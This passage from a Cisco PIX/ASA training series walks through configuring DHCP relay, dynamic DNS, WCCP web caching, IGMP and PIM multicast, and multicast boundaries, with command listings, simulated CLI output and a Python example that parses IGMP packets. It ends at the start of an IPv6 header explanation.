Enable the DHCP relay service on an interface (dhcprelay enable interfaceName).
Define a timeout for the address negotiation (dhcprelay timeout seconds).
Define the router gateway address, instead of the DHCP gateway reply, to be a PIX/ASA
interface (dhcprelay setroute interfaceName). Thus the PIX/ASA device can be made
to be the default gateway, even though the DHCP server has defined another
gateway.

Commands
# config t
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# nameif Edinburgh
(config-if)# exit
(config)# dhcprelay server 192.168.1.2
(config)# dhcprelay enable Edinburgh
(config)# dhcprelay timeout 10


(config)# exit
# show dhcprelay statistics
# show dhcprelay state

Example
# config t
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# nameif Edinburgh
(config-if)# exit
(config)# dhcprelay ?
configure mode commands/options:
enable Start a DHCP server task on an interface, but at least one
dhcpdrelay server must be configured before enable is issued
server Configure dhcprelay server information
setroute Configure the DHCP Relay Agent to change the first default
router address (in the packet sent from the DHCP server) to
the address of the client interface
timeout Configure timeout, the number of seconds for relay address
negotiation after this keyword
configure mode commands/options:
infinity Always stay on shared-tree
(config)# dhcprelay server ?
configure mode commands/options:
Hostname or A.B.C.D IP address of dhcprelay server to which
requests are forwarded
(config)# dhcprelay server 192.168.1.2
(config)# dhcprelay setroute ?
configure mode commands/options:
Available client interface names:
Inf2 Name of interface Ethernet2
Inside Name of interface Ethernet1
Edinburgh Name of interface Ethernet0
(config)# dhcprelay enable ?
configure mode commands/options:
Available interfaces on which relay agent will accept client requests:
Inf2 Name of interface Ethernet2
Inside Name of interface Ethernet1
Edinburgh Name of interface Ethernet0
(config)# dhcprelay enable Edinburgh
(config)# dhcprelay timeout ?
configure mode commands/options:
<1-3600> Enter number of seconds for relay address negotiation, default
is 60 seconds
<cr>
(config)# dhcprelay timeout 10
(config)# exit
# show dhcprelay statistics
DHCP UDP Unreachable Errors: 0
DHCP Other UDP Errors: 0
Packets Relayed
BOOTREQUEST 0
DHCPDISCOVER 7
DHCPREQUEST 3
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 0
BOOTREPLY 0
DHCPOFFER 7
DHCPACK 3

# show dhcprelay state
Context Configured as DHCP Relay
Interface outside, Not Configured for DHCP
Interface inf, Configured for DHCP RELAY SERVER
Interface Edinburgh, Configured for DHCP RELAY

Cisco PIX/ASA Challenge 117


Title: Configuring Dynamic DNS (DDNS)
Outline
DDNS is a service which integrates DNS and DHCP, where the DHCP service allocates IP
addresses based on physical addresses, while DNS resolves hostnames to IP addresses, or
vice-versa. A DDNS name and address mapping is held within the DHCP server using the
following records:

A RR (Resource Record), which is the name to IP address mapping.
PTR RR, which maps addresses to names.

The main application of DDNS is where hosts are continually changing their IP address
(such as in mobile applications), and hosts can still find each other. The mapping is thus
held on a DHCP server. The main advantage of DDNS is that a host can notify a DHCP
server of a change to its configured parameters, typically its hostname and address, so that
the active DNS configuration is updated. The most common DDNS setups are where the
DHCP client updates the A RR and the DHCP server updates the PTR RR, and where the
DHCP server updates both.
In this example the client updates both A RR and PTR RR for a defined static IP address.
Objectives
The objectives of this challenge are to:

Define interface details.
Define a static IP address on E0 (the static IP address).
Define a DDNS update method for the client to update both the A RR and the PTR
RR using the ddns both command.
Associate the DDNS update method with an interface.

Commands
In this example the hostname is defined as myddns.com, which will associate with an IP
address of 192.168.1.1:
# config t
(config)# ddns update method myddns
(DDNS-update-method)# ddns both
(DDNS-update-method)# exit
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# nameif Edinburgh
(config-if)# ddns update myddns
(config-if)# ddns update hostname myddns.com
(config-if)# exit
(config)# exit

Example
# config t
(config)# ddns ?
configure mode commands/options:
update Configure dynamic DNS update
(config)# ddns update ?
configure mode commands/options:
method Configure dynamic DNS update method
(config)# ddns update method ?
configure mode commands/options:
WORD Dynamic DNS update method name
(config)# ddns update method myddns
(DDNS-update-method)# ?
Dynamic DNS update method configuration commands:
ddns IETF standardized Dynamic DNS update
exit Exit from DNS dynamic update method configuration mode
help Help for Dynamic DNS update method configuration commands
interval Specify interval between DNS updates
no Negate a command or set its defaults
(DDNS-update-method)# ddns ?
dynupd-method mode commands/options:
both Update both DNS A and PTR records
<cr>
configure mode commands/options:
update Configure dynamic DNS update
(DDNS-update-method)# ddns both ?
dynupd-method mode commands/options:
<cr>
(DDNS-update-method)# ddns both
(DDNS-update-method)# inter ?
dynupd-method mode commands/options:
maximum Specify maximum interval between DNS updates
configure mode commands/options:
Ethernet IEEE 802.3
Vlan Catalyst Vlans
<cr>
(DDNS-update-method)# inter max ?
dynupd-method mode commands/options:
<0-364> Days
(DDNS-update-method)# help ddns
USAGE:
[no] ddns [both]
DESCRIPTION:
ddns IETF standardized Dynamic DNS update
SYNTAX:
both Update both DNS A and PTR records
(DDNS-update-method)# exit
(config)# int e0
(config-if)# ddns ?
interface mode commands/options:
update Configure dynamic DNS update
configure mode commands/options:
update Configure dynamic DNS update
(config-if)# ddns update ?
interface mode commands/options:
WORD Method name
hostname Dynamic DNS update hostname
configure mode commands/options:
method Configure dynamic DNS update method
(config-if)# ddns update host ?
interface mode commands/options:
WORD Update DNS address records for this hostname
(config-if)# ddns u myddns?
interface mode commands/options:
<cr>
(config-if)# nameif Edinburgh
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# ddns update myddns
(config-if)# ddns update hostname myddns.com
(config-if)# exit
(config)# exit

Cisco PIX/ASA Challenge 118


Title: Configuring Dynamic DNS (DDNS) for Client Updates on A RR and PTR RR,
where the DHCP server implements the update request.
Outline
In this example of DDNS, the client updates both A RR and PTR RR and the DHCP server
honors the client update request.
The objectives of this challenge are to:

Define interface details.
Define a DHCP entry on the interface.
Define a DDNS update method for the client to update both the A RR and the PTR
RR using the ddns both command.
Associate the DDNS update method with an interface.
Define that the DHCP client requests that the DHCP server does not make any updates
(using dhcp-client update dns server none).

Commands
# config t
(config)# dhcp-client update dns server none
(config)# ddns update method myddns
(DDNS-update-method)# ddns both
(DDNS-update-method)# exit
(config)# int e0
(config-if)# ip address dhcp
(config-if)# nameif Edinburgh
(config-if)# ddns update myddns
(config-if)# ddns update hostname myddns.com
(config-if)# exit
(config)# exit

Example
# config t
(config)# dhcp-client ?
configure mode commands/options:
update Configure automatic updates
(config)# dhcp-client update ?
configure mode commands/options:
dns Configure DNS dynamic update information
(config)# dhcp-client update dns ?
configure mode commands/options:
server Configure requested server dynamic DNS updates
<cr>
(config)# dhcp-client update dns server ?
configure mode commands/options:
both Server updates both (A and PTR) records
none Ask server to perform no updates
(config)# dhcp-client update dns server none
(config)# ddns ?
configure mode commands/options:
update Configure dynamic DNS update
(config)# ddns update ?
configure mode commands/options:
method Configure dynamic DNS update method
(config)# ddns update method ?
configure mode commands/options:
WORD Dynamic DNS update method name
(config)# ddns update method myddns
(DDNS-update-method)# ?
Dynamic DNS update method configuration commands:
ddns IETF standardized Dynamic DNS update
exit Exit from DNS dynamic update method configuration mode
help Help for Dynamic DNS update method configuration commands
interval Specify interval between DNS updates
no Negate a command or set its defaults
(DDNS-update-method)# ddns ?
dynupd-method mode commands/options:
both Update both DNS A and PTR records
<cr>
configure mode commands/options:
update Configure dynamic DNS update
(DDNS-update-method)# ddns both
(DDNS-update-method)# exit
(config)# int e0
(config-if)# ddns ?
interface mode commands/options:
update Configure dynamic DNS update
configure mode commands/options:
update Configure dynamic DNS update
(config-if)# ddns update ?
interface mode commands/options:
WORD Method name
hostname Dynamic DNS update hostname
configure mode commands/options:
method Configure dynamic DNS update method
(config-if)# ddns update host ?
interface mode commands/options:
WORD Update DNS address records for this hostname
(config-if)# ddns u myddns?
interface mode commands/options:
<cr>
(config-if)# nameif Edinburgh
(config-if)# ip address ?
interface mode commands/options:
Hostname or A.B.C.D Firewall's network interface address
dhcp Keyword to use DHCP to poll for information. Enables the
DHCP client feature on the specified interface
pppoe Keyword to use PPPoE to poll for information. Enables
the PPPoE client feature on the specified interface
(config-if)# ip address dhcp
(config-if)# ddns update myddns
(config-if)# ddns update hostname myddns.com
(config-if)# exit
(config)# exit

Cisco PIX/ASA Challenge 119


Title: Configuring Dynamic DNS (DDNS) where the client instructs the server not to update the A RR and PTR RR
Outline
In this example of DDNS, the client instructs the server not to update the A RR and PTR RR.
The objectives of this challenge are to:

Define interface details.
Define a DHCP entry on the interface (using ip address dhcp and dhcp client
update dns server none).
Enable the DHCP server to override client update requests (using dhcpd update dns
both override).
Define a DDNS update method for the client to update both the A RR and the PTR
RR using the ddns both command.
Associate the DDNS update method with an interface.
Commands


# config t
(config)# dhcpd update dns both override
(config)# ddns update method myddns
(DDNS-update-method)# ddns both
(DDNS-update-method)# exit
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ddns update myddns
(config-if)# ddns update hostname myddns.com
(config-if)# dhcp client update dns server none
(config-if)# ip address dhcp
(config-if)# exit
(config)# exit

Example
# config t
pixfirewall(config)# dhcpd ?
configure mode commands/options:
address       Configure the IP pool address range after this keyword
auto_config   Enable auto configuration from client
dns           Configure the IP addresses of the DNS servers after this
              keyword
domain        Configure DNS domain name after this keyword
enable        Enable the DHCP server
lease         Configure the DHCPD lease length after this keyword
option        Configure options to pass to DHCP clients after this keyword
ping_timeout  Configure ping timeout value after this keyword
wins          Configure the IP addresses of the NETBIOS servers after this
              keyword
(config)# dhcpd u ?
configure mode commands/options:
dns  Configure DNS dynamic updates
(config)# dhcpd u d ?
configure mode commands/options:
both       Update both A and PTR DNS records
interface  Specify interface to which action will apply to
override   Server overrides client request
<cr>
(config)# dhcpd u d b ?
configure mode commands/options:
interface  Specify interface to which action will apply to
override   Server overrides client request
<cr>
(config)# dhcpd update dns both override
(config)# ddns update method myddns
(DDNS-update-method)# ddns both
(DDNS-update-method)# exit
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address dhcp
(config-if)# ddns update myddns
(config-if)# ddns update hostname myddns.com


(config-if)# dhcp c ?
interface mode commands/options:
route   Options for routes installed by dhcp
update  Dynamically update information
(config-if)# dhcp c u ?
interface mode commands/options:
dns Dynamic DNS update configuration
(config-if)# dhcp c u d ?
interface mode commands/options:
server Dynamic DNS updates requested of server
<cr>
(config-if)# dhcp c u d s ?
interface mode commands/options:
both Server updates both (A and PTR) records
none Ask server to perform no updates
(config-if)# exit
(config)# exit

Cisco PIX/ASA Challenge 120


Title: WCCP (Web Cache Communications Protocol)
Outline
WCCP is a Cisco-developed protocol that redirects Web requests to a Web cache, which stores previously
accessed Web pages; when users re-request a page it is served from the cache rather than from the remote server.
The objectives of this challenge are to:

Define interface details.
Enable WCCP (wccp web-cache).
Define that Web traffic (on port 80) that enters from the outside interface is
redirected to a web cache.

Commands


# config t
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# exit
(config)# wccp web-cache
(config)# wccp interface Edinburgh web-cache redirect in
(config)# exit

Example
# config t
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address dhcp
(config-if)# exit
(config)# wccp ?
configure mode commands/options:
<0-254>    Dynamically defined service identifier number
interface  Keyword to specify an interface
web-cache  Standard web caching service
(config)# wccp web ?
configure mode commands/options:
group-list     Set the access-list used to permit group membership
password       Authentication password (key)
redirect-list  Set the access-list used to permit redirection
<cr>
(config)# wccp web-cache
(config)# wccp interface ?
configure mode commands/options:
Current available interface(s):
Inf2       Name of interface Ethernet2
Inside     Name of interface Ethernet1
Edinburgh  Name of interface Ethernet0
(config)# wccp in Edinburgh ?
configure mode commands/options:
<0-254>    Dynamically defined service identifier number
web-cache  Standard web caching service
(config)# wccp in Edinburgh web-cache ?
configure mode commands/options:
redirect  Set packet redirection options for the service
(config)# wccp in Edinburgh web-cache redirect ?
configure mode commands/options:
in  Redirect to a Cache Engine appropriate ingress packets
(config)# wccp in Edinburgh web-cache redirect in ?
configure mode commands/options:
<cr>
(config)# wccp interface Edinburgh web-cache redirect in
(config)# exit

Cisco PIX/ASA Test (Challenge 121)


Outline
This challenge involves taking a PIX test on DHCP, DDNS and WCCP. The main facts are:

DHCP allocates IP addresses based on client MAC addresses.
DDNS supports the updating of IP information.
WCCP allows Web requests to be forwarded to a web cache, if the page already
exists in the cache.

Cisco PIX/ASA Challenge 122


Title: Multicast Routing
Outline
Multicast allows a sender to send packets to multiple recipients, which is useful in reducing
bandwidth. These use special multicast addresses of 224.0.0.0/4 (Class D), which spans from
224.0.0.0 to 239.255.255.255. Subscribers then join groups using the Internet Group
Management Protocol (IGMP) to alert local multicast routers. IGMP is a fairly
simple protocol and its message consists of:

A version number.
A type.
A checksum.
Group. This is the multicast address to be joined.

Thus when a host joins, the multicast router knows that at least one host on that segment is
interested in receiving packets for a specific multicast address. The routers then require a
multicast routing protocol between them in order to get the data packets to the host(s).
Multicast routing protocols typically work on two main methods:


Dense mode. This works by flooding data into the network and then pruning back
parts of the tree. This tree represents a set of routers, and the more pruning that is
done, the smaller the tree, and the less bandwidth will be wasted in sending
multicast packets. Thus if there are no interested branches within an AS, the
border router sends a prune message to the upstream router.
Sparse mode. This uses a Rendezvous Point (RP), where join messages are sent to
the RP's unicast address. It cuts down bandwidth, and is efficient, but requires
careful configuration on devices.

The main multicast routing mechanisms are:

DVMRP (Distance Vector Multicast Routing Protocol). DVMRP uses IGMP sub-code
13, and implements dense flooding, which is effective, but not efficient in its
usage of bandwidth. With this the router floods the whole network at the start, and
then prunes back subnets that are not of interest.
PIM (Protocol Independent Multicast). PIM uses IP protocol 103. In dense mode
operation it operates like DVMRP. It implements joins, prunes, and grafts, where a
graft is the opposite of a prune, and adds a branch back onto the tree.

The objectives of this challenge are to:

Enable multicast routing. When this is enabled on the device, IGMP Version 2 is
automatically enabled on the interfaces.
Disable IGMP on E1. This is useful in cutting down on excess traffic, if an interface is
not used for multicast traffic.

Commands
# config t
(config)# multicast-routing
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int e1
(config-if)# nameif Glasgow
(config-if)# ip address 192.168.0.2 255.255.255.0
(config-if)# no shutdown
(config-if)# no igmp
(config-if)# exit

Example
# config t
(config)# multicast-routing


(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int e1
(config-if)# nameif Glasgow
(config-if)# ip address 192.168.0.2 255.255.255.0
(config-if)# no shutdown
(config-if)# no igmp
(config-if)# exit

Cisco PIX/ASA Challenge 123


Title: Multicast Group Membership
Outline
The PIX/ASA can become part of a multicast group using the IGMP protocol on an interface,
and defining the join group (igmp join-group address). Also multicast traffic can be sent
to a network segment using a statically joined group (igmp static-group address). The
objectives of this challenge are to:

Enable multicast routing.
Configure the Ethernet ports.
Configure join-group membership on E0. With join-group membership, the
PIX/ASA accepts and forwards all multicast packets to the defined interface.
Configure static-group membership on E1. With static-group membership, the
PIX/ASA does not accept multicast packets, but forwards them to the defined
interface.
Show IGMP traffic.

Commands
# config t
(config)# multicast-routing
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# igmp join-group 224.0.0.1
(config-if)# exit
(config)# int e1
(config-if)# nameif Glasgow
(config-if)# ip address 192.168.0.2 255.255.255.0
(config-if)# no shutdown
(config-if)# igmp static-group 224.0.0.1
(config-if)# exit

Example


# config t
(config)# multicast-routing
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# igmp ?
interface mode commands/options:
access-group             group membership access
forward                  forward
join-group               join multicast group
limit                    host join limit
query-interval           host query interval
query-max-response-time  max query response value
query-timeout            previous querier timeout
static-group             static multicast group
version                  version
<cr>
(config-if)# igmp join-group ?
interface mode commands/options:
A.B.C.D IP group address
(config-if)# igmp join-group 224.0.0.1
(config-if)# exit
(config)# int e1
(config-if)# nameif Glasgow
(config-if)# ip address 192.168.0.2 255.255.255.0
(config-if)# no shutdown
(config-if)# igmp static-group ?
interface mode commands/options:
A.B.C.D IP group address
(config-if)# igmp static-group 224.0.0.1
(config-if)# exit
(config)# exit
# show igmp traffic
IGMP Traffic Counters
Elapsed time since counters cleared: 00:00:35
                     Received  Sent
Valid IGMP Packets   10        4
Queries              5         0
Reports              2         0
Leaves               0         0
Mtrace packets       0         0
DVMRP packets        0         0
PIM packets          30        0

Errors:
Malformed Packets    0
Martian source       0
Bad Checksums        0
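The IGMP fields listed under Challenge 122 and the counters in the show igmp traffic output above, as an added Python example that is not part of the NetworkSims material: it builds and parses IGMPv2 messages, verifies the RFC 1071 checksum, and sorts constructed sample packets into the same counter names; the martian-source rule is an assumption, not something the page states.

```python
import struct
from ipaddress import IPv4Address

# IGMP message types: v2 query/report/leave (RFC 2236) plus the v1 report.
IGMP_QUERY = 0x11
IGMP_V1_REPORT = 0x12
IGMP_V2_REPORT = 0x16
IGMP_LEAVE = 0x17

COUNTERS = ("Queries", "Reports", "Leaves",
            "Malformed Packets", "Martian source", "Bad Checksums")


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words (odd length padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_igmp(msg_type: int, group: str, max_resp: int = 100) -> bytes:
    """Constructed IGMPv2 message: type(8) | max resp time(8) | checksum(16) | group(32)."""
    packed = IPv4Address(group).packed
    body = struct.pack("!BBH4s", msg_type, max_resp, 0, packed)
    return struct.pack("!BBH4s", msg_type, max_resp, inet_checksum(body), packed)


def classify(src_ip: str, payload: bytes) -> str:
    """Name the 'show igmp traffic' counter this received message would increment.

    Assumption (not from the page): a multicast, broadcast or loopback source is
    a martian; 0.0.0.0 is allowed, since a host may report before it has an address.
    """
    if len(payload) < 8:
        return "Malformed Packets"
    if inet_checksum(payload) != 0:          # a correct message sums to zero
        return "Bad Checksums"
    src = IPv4Address(src_ip)
    if src.is_multicast or src.is_loopback or src == IPv4Address("255.255.255.255"):
        return "Martian source"
    msg_type = payload[0]
    group = IPv4Address(payload[4:8])
    if msg_type == IGMP_QUERY:
        # A general query carries 0.0.0.0; a group-specific query names the group.
        if group != IPv4Address("0.0.0.0") and not group.is_multicast:
            return "Malformed Packets"
        return "Queries"
    if msg_type in (IGMP_V1_REPORT, IGMP_V2_REPORT, IGMP_LEAVE):
        if not group.is_multicast:            # group must be a Class D address
            return "Malformed Packets"
        return "Leaves" if msg_type == IGMP_LEAVE else "Reports"
    return "Malformed Packets"


def tally(packets):
    """Aggregate (source_ip, payload) pairs into the counter layout shown on the page."""
    counters = {name: 0 for name in COUNTERS}
    for src_ip, payload in packets:
        counters[classify(src_ip, payload)] += 1
    counters["Valid IGMP Packets"] = (counters["Queries"] + counters["Reports"]
                                      + counters["Leaves"])
    return counters


# Constructed sample traffic: a querier on 192.168.0.1, two hosts, and three bad packets.
_report = build_igmp(IGMP_V2_REPORT, "224.0.0.1")
SAMPLE_PACKETS = [
    ("192.168.0.1", build_igmp(IGMP_QUERY, "0.0.0.0")),            # general query
    ("192.168.0.10", _report),                                       # v2 report
    ("192.168.0.11", build_igmp(IGMP_LEAVE, "224.0.0.1")),          # leave group
    ("224.0.0.1", _report),                                          # martian source
    ("192.168.0.12", _report[:-1] + bytes([_report[-1] ^ 0xFF])),    # bad checksum
    ("192.168.0.13", _report[:5]),                                   # truncated
]

if __name__ == "__main__":
    for name, value in tally(SAMPLE_PACKETS).items():
        print("%-20s %d" % (name, value))
```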

Cisco PIX/ASA Challenge 124



Title: Controlling Access to Multicast Group Membership using Access-lists
Outline
The PIX/ASA can use access-lists to define the groups that hosts will join (using the igmp
access-group listno command on the defined interface). The objectives of this challenge are to:

Enable multicast routing.
Configure the Ethernet ports.
Configure an extended access-list which defines the hosts that can join multicast
groups.
Define the limit of the number of IGMP hosts that can join on a per-interface basis.
Define the Query Interval, which is the time that the PIX/ASA waits between
sending out messages to discover multicast groups (igmp query-interval time).
Define the Query Timeout, which is the time that the PIX/ASA will wait before it
assumes that it is the designated router and starts sending query messages (igmp
query-timeout time).

Commands
# config t
(config)# multicast-routing
(config)# access-list 100 permit igmp host 20.10.10.1 host 224.0.0.1
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# igmp access-group 100
(config-if)# igmp join-group 224.0.0.1
(config-if)# igmp limit 20
(config-if)# igmp query-interval 100
(config-if)# igmp query-timeout 100
(config-if)# exit
(config)# int e1
(config-if)# nameif Glasgow
(config-if)# ip address 192.168.0.2 255.255.255.0
(config-if)# no shutdown
(config-if)# igmp static-group 224.0.0.1
(config-if)# exit

Example
# config t
(config)# multicast-routing
(config)# access-list ?
configure mode commands/options:
WORD < 241 char  Access list identifier
alert-interval   Specify the alert interval for generating syslog message
                 106001 which alerts that the system has reached a deny
                 flow maximum. If not specified, the default value is 300 sec
deny-flow-max    Specify the maximum number of concurrent deny flows that can
                 be created. If not specified, the default value is 4096
(config)# access-list 100 ?
configure mode commands/options:
deny       Specify packets to reject
ethertype  Configure access policy for non IP traffic through the
           system when configured in transparent mode
extended   Configure access policy for IP traffic through the system
line       Use this to specify line number at which ACE should be entered
permit     Specify packets to forward
remark     Specify a comment (remark) for the access-list after this
           keyword
standard   Use this to configure policy having destination host or network
           only
webtype    Use this to configure WebVPN related policy
(config)# access-l 100 permit ?
configure mode commands/options:
<0-255>              Enter protocol number (0 - 255)
Hostname or A.B.C.D  Match based on destination network address
ah
any                  Abbreviation for an address and mask of
                     0.0.0.0 0.0.0.0
eigrp
esp
gre
host                 Use this keyword to configure destination host
icmp
icmp6
igmp
igrp
ip
ipinip
ipsec
nos
object-group         Specify a protocol object-group after this keyword
ospf
pcp
pim
pptp
snp
tcp
udp
(config)# access-l 100 permit igmp ?
configure mode commands/options:
Hostname or A.B.C.D  Source IP address
any                  Abbreviation for source address and mask of
                     0.0.0.0 0.0.0.0
host                 Use this keyword to configure source host
interface            Use interface address as source address
object-group         Network object-group for source address
(config)# access-list 100 permit igmp host 20.10.10.1 host 224.0.0.1
(config)# int e0
(config-if)# nameif Edinburgh
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown


(config-if)# igmp access-group ?
interface mode commands/options:
WORD  Named access list specifying access group range
(config-if)# igmp access-group 100
(config-if)# igmp join-group 224.0.0.1
(config-if)# igmp limit ?
interface mode commands/options:
<0-500> Number of IGMP hosts that can join
(config-if)# igmp limit 20
(config-if)# igmp query-interval ?
interface mode commands/options:
<1-3600> Query interval in seconds
(config-if)# igmp query-interval 100
(config-if)# igmp query-t ?
interface mode commands/options:
<60-300> timeout value in seconds
(config-if)# igmp query-timeout 100
(config-if)# exit
(config)# int e1
(config-if)# nameif Glasgow
(config-if)# ip address 192.168.0.2 255.255.255.0
(config-if)# no shutdown
(config-if)# igmp static-group 224.0.0.1
(config-if)# exit

Cisco PIX/ASA Challenge 125


Title: Enabling and configuring PIM (Protocol Independent Multicast) for Sparse Mode
Outline
With multicast, PIM is used to construct a multicast distribution tree for an IP multicast
group. Data packets from senders to a multicast group are then forwarded along this tree to
the receivers which have joined the group. It uses the following elements:

Rendezvous Point (RP). This is the router at the root of a distribution tree for a
multicast group. Receivers send join messages for a group, and senders send
their data to the RP, so that receivers can discover senders and thus receive data
from them.
Designated Router (DR). There can be several PIM-SM routers on a local network.
One of these, the DR, then acts on behalf of directly connected hosts. An election
process determines the winning interface.

The main methods used in PIM are:


Sparse Mode (SM). PIM-SM is the most popular deployment, and is efficient for
routing to multicast groups that may span many subnets. It constructs a tree from
each sender to the receivers in the multicast group. All routers in a common PIM-SM
domain must know the RP (Rendezvous Point). The command used for this is pim rp-address IP.
PIM-SM is used when there are very few nodes subscribing to multicast sessions.
Dense Mode (DM). PIM-DM floods packets throughout the network and then
prunes off the branches where no receivers exist.
Source Specific Mode (SSM).
Bidirectional Mode (Bidir).

For a multicast group (G), the host joins using IGMP. The router then forwards multicast
packets only to the interfaces where hosts have joined the group. Designated Routers
(DRs) are then used to send out join/prune messages to a group-specific
Rendezvous Point (RP), for every group in which they have active members. The main
objectives of this challenge are to:

Configure the Ethernet ports.
Enable PIM on E0.
Define PIM parameters.
Define a static rendezvous point (RP). The command used is pim rp-address IP.
Define the designated router (DR) priority. The DR must send out register, join, and
prune messages to the RP. If there is more than one multicast router within a given
network segment, there is an election process, where the higher the value, the higher
the priority. The command used is pim dr-priority value.
Define the PIM hello message interval. The DR sends out a router query message every 30
seconds. If this is to be changed the command used is pim hello-interval value.
Define the PIM join-prune interval. The DR sends out PIM join/prune messages every 60
seconds. If this is to be changed the command used is pim join-prune-interval
value.

Commands
# config t
(config)# int e0
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# nameif Edinburgh
(config-if)# pim
(config-if)# pim dr-priority 50
(config-if)# pim hello-interval 50
(config-if)# pim join-prune-interval 50
(config-if)# exit
(config)# pim rp-address 192.168.0.1

Example


# config t
(config)# int e0
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# nameif ?
interface mode commands/options:
WORD < 49 char A name by which this interface will be referred in all other
Commands
(config-if)# nameif Edinburgh
(config-if)# pim ?
interface mode commands/options:
dr-priority          PIM Hello DR priority
hello-interval       PIM neighbor Hello announcement interval
join-prune-interval  PIM periodic Join-Prune announcement interval
<cr>
configure mode commands/options:
accept-register        Register accept filter
old-register-checksum  Generate registers compatible with older IOS versions
rp-address             Configure Sparse-Mode Rendezvous Point
spt-threshold          Configure threshold for SPT switchover on last-hop
(config-if)# pim
(config-if)# pim dr-priority ?
interface mode commands/options:
<0-4294967295> Hello DR priority, preference given to larger value
(config-if)# pim dr-priority 50
(config-if)# pim hello-interval ?
interface mode commands/options:
<1-3600> Hello interval in seconds
(config-if)# pim hello-interval 50
(config-if)# pi join-prune-interval ?
interface mode commands/options:
<10-600> Join-Prune interval in seconds
(config-if)# pi join-prune-interval 50
(config-if)# exit
(config)# pim ?
configure mode commands/options:
accept-register        Register accept filter
old-register-checksum  Generate registers compatible with older IOS versions
rp-address             Configure Sparse-Mode Rendezvous Point
spt-threshold          Configure threshold for SPT switchover on last-hop
(config)# pim accept-register ?
configure mode commands/options:
list       Access list
route-map  Route-map
(config)# pim old-register-checksum ?
configure mode commands/options:
<cr>

exec mode commands/options:
Hostname or A.B.C.D     Ping destination IPv4 address or hostname
Hostname or X:X:X:X::X  Ping destination IPv6 address or hostname
<cr>
(config)# pim rp-address ?
configure mode commands/options:
Hostname or A.B.C.D IP name or address of Rendezvous Point
(config)# pim rp-address 192.168.0.1
(config)# pim spt-threshold ?
configure mode commands/options:
infinity Always stay on shared-tree

Cisco PIX/ASA Challenge 126


Title: Defining a multicast boundary
Outline
A standard ACL can be used to define the limits of a multicast boundary. The main
objectives of this challenge are to:

Configure the Ethernet ports.
Enable PIM on E0.
Define a standard ACL.
Apply the ACL to a multicast boundary.

Commands
# config t
(config)# access-list 10 standard permit 10.0.0.1 0.0.0.255
(config)# int e0
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# nameif Edinburgh
(config-if)# multicast boundary 10
(config-if)# exit

Example
# config t
(config)# access-list 10 standard permit 10.0.0.1 0.0.0.255
(config)# int e0
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# nameif Edinburgh
(config-if)# multicast boundary 10
(config-if)# exit


Cisco PIX/ASA Test (Challenge 127)


Outline
This challenge involves taking a PIX test on multicast routing. The main facts are:

Multicast routing uses Class D addresses, ranging from 224.0.0.0 to 239.255.255.255.
224.0.0.0 is never assigned to a group.
224.0.0.1 is assigned to all the systems within a given subnet.
IGMP Version 2 is automatically enabled on all the interfaces when multicast routing
is enabled.
The no igmp command is used on an interface to disable multicast routing on an
interface.

Cisco PIX/ASA Challenge 128


Title: IPv6 - Explained
Outline
The RFC2460 specification outlines IPv6, and defines the main changes over IPv4 as:

Expanded addressing capabilities. The size of the IP address will be increased to
128 bits, rather than 32 bits. This will allow for more levels of addressing hierarchy,
an increased number of addressable nodes and a simpler auto-configuration of
addresses. With multicast routing, the scalability is improved by adding a scope field
to the multicast addresses. As well as this, an anycast address has been added so that
packets can be sent to any one of a group of nodes.
Improved IP header format. This tidies the IPv4 header fields by dropping the least
used options, or making them optional.
Improved support for extensions and options. These allow for different encodings
of the IP header options, and thus allow for variable lengths and increased flexibility
for new options.
Flow labeling capability. A new capability is added to enable the labeling of packets
belonging to particular traffic flows for which the sender requests special handling,
such as non-default quality of service or real-time service.
Authentication and privacy capabilities. Extensions to support authentication, data
integrity, and (optional) data confidentiality are specified for IPv6.


Autoconfiguration and multiple IP addresses

IPv4 requires a significant amount of human intervention to set up the address of each of
the nodes. IPv6 improves this by supplying autoconfiguration and renumbering facilities, which
allow hosts to renumber without significant human intervention.
IPv4 has a stateful address structure, which either requires the user to manually set up the
IP address of the computer or to use DHCP servers to provide IP addresses for a given MAC
address. If a node moves from one subnet to another, the user must reconfigure the IP
address, or request a new IP address from the DHCP server. IPv6 supports stateless
autoconfiguration, where a host constructs its own IPv6 address. This occurs by adding its MAC
address to a subnet prefix. The host automatically learns which subnet it is on by
communicating with the router which is connected to the network that the host is connected
to.
IPv6 supports multiple IP addresses for each host. These addresses can be either valid,
deprecated or invalid. A valid address would be used for new and existing communications.
A deprecated address could be used only for existing communications (as they perhaps
migrate to the new address). An invalid address would not be used for any
communications. When renumbering, a host would deprecate the existing IP address, and
set the new IP address as valid. All new communications would use the new IP address, but
connections to the previous address would still operate. This allows a node to gradually
migrate from one IP address to another.
IPv6 header format
Figure 1 shows the basic format of the IPv6 header. The main fields are:

